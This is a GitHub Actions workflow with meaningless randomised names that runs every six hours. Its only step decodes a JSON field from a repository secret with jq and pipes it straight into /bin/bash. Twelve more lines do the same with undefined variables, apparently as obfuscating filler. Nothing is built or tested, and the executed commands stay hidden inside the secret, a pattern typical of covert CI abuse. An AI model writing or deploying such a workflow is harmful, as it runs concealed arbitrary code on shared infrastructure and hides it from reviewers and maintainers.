name: liufutu4716

on:
  workflow_dispatch:
  schedule:
    - cron: '19 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liufutu4716
        env:
          e4757: ${{ secrets.e4757 }}
        run: |
          echo $e4757 | jq -r .alpq5 | /bin/bash
          echo $qvrib077 | jq -r .gkuw792 | /bin/bash
          echo $vjwrh58928 | jq -r .ja4 | /bin/bash
          echo $qjx32 | jq -r .ld4 | /bin/bash
          echo $dhbhj03 | jq -r .aabc08 | /bin/bash
          echo $mz8 | jq -r .asxtf02662 | /bin/bash
          echo $x10 | jq -r .g7 | /bin/bash
          echo $sa8 | jq -r .usd7494 | /bin/bash
          echo $rm468 | jq -r .lxp40 | /bin/bash
          echo $of6740 | jq -r .mit3518 | /bin/bash
          echo $r281 | jq -r .l6 | /bin/bash
          echo $j970 | jq -r .wy0 | /bin/bash
          echo $wlbj61 | jq -r .ukiby6404 | /bin/bash

